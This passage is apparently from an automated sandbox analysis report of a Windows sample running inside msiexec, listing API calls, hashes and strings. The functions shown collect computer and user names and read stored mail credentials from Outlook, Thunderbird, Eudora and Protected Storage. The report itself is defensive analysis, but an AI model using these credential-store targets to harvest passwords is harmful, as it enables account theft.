                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??3@
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 613200358-0
                                                                                                                                                • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                                                                                • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                                                                                APIs
                                                                                                                                                • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: InvalidateMessageRectSend
                                                                                                                                                • String ID: d=E
                                                                                                                                                • API String ID: 909852535-3703654223
                                                                                                                                                • Opcode ID: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                                                                                                • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                                                                                                                • Opcode Fuzzy Hash: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                                                                                                • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                                                                                                                APIs
                                                                                                                                                • wcschr.MSVCRT ref: 0040F79E
                                                                                                                                                • wcschr.MSVCRT ref: 0040F7AC
                                                                                                                                                  • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                                                                                  • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4,?,?,?,?,004032AB,?), ref: 0040AACB
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: wcschr$memcpywcslen
                                                                                                                                                • String ID: "
                                                                                                                                                • API String ID: 1983396471-123907689
                                                                                                                                                • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                                                                • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                                                                                • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                                                                • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                • _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FilePointer_memicmpmemcpy
                                                                                                                                                • String ID: URL
                                                                                                                                                • API String ID: 2108176848-3574463123
                                                                                                                                                • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                                                                • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                                                                                                                • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                                                                • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                                                                                                                APIs
                                                                                                                                                • _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _snwprintfmemcpy
                                                                                                                                                • String ID: %2.2X
                                                                                                                                                • API String ID: 2789212964-323797159
                                                                                                                                                • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                                                                • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                                                                                • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                                                                • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _snwprintf
                                                                                                                                                • String ID: %%-%d.%ds
                                                                                                                                                • API String ID: 3988819677-2008345750
                                                                                                                                                • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                                                                                • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                                                                                                • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                                                                                • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040E770
                                                                                                                                                • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSendmemset
                                                                                                                                                • String ID: F^@
                                                                                                                                                • API String ID: 568519121-3652327722
                                                                                                                                                • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                                                                • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                                                                                • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                                                                • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: PlacementWindowmemset
                                                                                                                                                • String ID: WinPos
                                                                                                                                                • API String ID: 4036792311-2823255486
                                                                                                                                                • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                                                                • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                                                                                • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                                                                • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                                                                                APIs
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??3@DeleteObject
                                                                                                                                                • String ID: r!A
                                                                                                                                                • API String ID: 1103273653-628097481
                                                                                                                                                • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                                                • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                                                                                • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                                                • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                • wcsrchr.MSVCRT ref: 0040DCE9
                                                                                                                                                • wcscat.MSVCRT ref: 0040DCFF
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileModuleNamewcscatwcsrchr
                                                                                                                                                • String ID: _lng.ini
                                                                                                                                                • API String ID: 383090722-1948609170
                                                                                                                                                • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                                                                                • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                                                                                                                • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                                                                                • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                                                                                                                APIs
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
• GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
• String ID: SHGetSpecialFolderPathW$shell32.dll
• API String ID: 2773794195-880857682
APIs
• memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
• memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
• memset.MSVCRT ref: 0042BAAE
• memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: memcpy$memset
• String ID:
• API String ID: 438689982-0
APIs
  • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
• ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
• ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
• ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
• ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: ??2@$memset
• String ID:
• API String ID: 1860491036-0
APIs
• wcslen.MSVCRT ref: 0040A8E2
  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
  • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
  • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
• free.MSVCRT ref: 0040A908
• free.MSVCRT ref: 0040A92B
• memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: free$memcpy$mallocwcslen
• String ID:
• API String ID: 726966127-0
APIs
• wcslen.MSVCRT ref: 0040B1DE
• free.MSVCRT ref: 0040B201
  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
  • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
  • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
• free.MSVCRT ref: 0040B224
• memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: free$memcpy$mallocwcslen
• String ID:
• API String ID: 726966127-0
APIs
• memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
  • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
  • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
  • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
• memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
• memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
• memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: memcmp$memcpy
• String ID:
• API String ID: 231171946-0
APIs
• strlen.MSVCRT ref: 0040B0D8
• free.MSVCRT ref: 0040B0FB
  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
  • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
  • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
• free.MSVCRT ref: 0040B12C
• memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: free$memcpy$mallocstrlen
• String ID:
• API String ID: 3669619086-0
APIs
• ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
• ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
• ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
• ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: ??2@
• String ID:
• API String ID: 1033339047-0
APIs
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
• malloc.MSVCRT ref: 00417407
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
• free.MSVCRT ref: 00417425
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: ByteCharMultiWide$freemalloc
• String ID:
• API String ID: 2605342592-0
APIs
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: wcslen$wcscat$wcscpy
• String ID:
• API String ID: 1961120804-0
                                                                                                                                                • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                                                                                • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                                                                                                • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                                                                                • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                                                                                                                                Execution Graph

                                                                                                                                                Execution Coverage:2.1%
                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                Signature Coverage:0.5%
                                                                                                                                                Total number of Nodes:761
                                                                                                                                                Total number of Limit Nodes:20

Control-flow Graph (function 4082cd-40841a; graph drawing not reproduced)

APIs
• memset.MSVCRT ref: 0040832F
• memset.MSVCRT ref: 00408343
• memset.MSVCRT ref: 0040835F
• memset.MSVCRT ref: 00408376
• GetComputerNameA.KERNEL32(?,?), ref: 00408398
• GetUserNameA.ADVAPI32(?,?), ref: 004083AC
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
• strlen.MSVCRT ref: 004083E9
• strlen.MSVCRT ref: 004083F8
• memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
• String ID: 5$H$O$b$i$}$}
• API String ID: 1832431107-3760989150
• Opcode ID: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
• Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
• Opcode Fuzzy Hash: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
• Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65

Control-flow Graph (function 407ef8-407f8f; graph drawing not reproduced)

APIs
• FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
• FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
• strlen.MSVCRT ref: 00407F5C
• strlen.MSVCRT ref: 00407F64
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: FileFindstrlen$FirstNext
• String ID: ACD
• API String ID: 379999529-620537770
• Opcode ID: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
• Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
• Opcode Fuzzy Hash: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
• Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A

Control-flow Graph (graph drawing not reproduced)

APIs
• memset.MSVCRT ref: 00401E8B
• strlen.MSVCRT ref: 00401EA4
• strlen.MSVCRT ref: 00401EB2
• strlen.MSVCRT ref: 00401EF8
• strlen.MSVCRT ref: 00401F06
• memset.MSVCRT ref: 00401FB1
• atoi.MSVCRT(?), ref: 00401FE0
• memset.MSVCRT ref: 00402003
• sprintf.MSVCRT ref: 00402030
• memset.MSVCRT ref: 00402086
• memset.MSVCRT ref: 0040209B
• strlen.MSVCRT ref: 004020A1
• strlen.MSVCRT ref: 004020AF
• strlen.MSVCRT ref: 004020E2
• strlen.MSVCRT ref: 004020F0
• memset.MSVCRT ref: 00402018
  • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
  • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
• ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
  • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
• _mbscpy.MSVCRT(?,00000000), ref: 00402177
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: strlen$memset$_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
• String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
• API String ID: 3833278029-4223776976
• Opcode ID: 22bf87547929d6464d555c30866af4eff336c20ded2a6a53d3974d6186b3e924
• Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
• Opcode Fuzzy Hash: 22bf87547929d6464d555c30866af4eff336c20ded2a6a53d3974d6186b3e924
• Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D

Control-flow Graph (graph drawing not reproduced)

APIs
  • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
  • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
  • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
  • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
• ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
• DeleteObject.GDI32(?), ref: 0040D1A6
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
• String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
• API String ID: 745651260-375988210
• Opcode ID: 01abe85119e862d03ebbcbf30b96c63784c41f31500a9bb9b68e18ec68e211b7
• Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
• Opcode Fuzzy Hash: 01abe85119e862d03ebbcbf30b96c63784c41f31500a9bb9b68e18ec68e211b7
• Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A

Control-flow Graph (graph drawing not reproduced)

APIs
  • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
• LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
• GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
• _mbscpy.MSVCRT(?,?), ref: 00403E54
Strings
• www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
• www.google.com/Please log in to your Google Account, xrefs: 00403C9A
• www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
• Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
• Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
• Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
• Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
• Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
• www.google.com/Please log in to your Gmail account, xrefs: 00403C86
• pstorec.dll, xrefs: 00403C30
• PStoreCreateInstance, xrefs: 00403C44
• Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
Memory Dump Source
• Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: Library$AddressFreeLoadProc_mbscpy
• String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
• API String ID: 1197458902-317895162
• Opcode ID: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
• Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
• Opcode Fuzzy Hash: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
• Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699

Control-flow Graph (function 444c4a-444e0f; graph drawing not reproduced)

APIs
Memory Dump Source
• Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
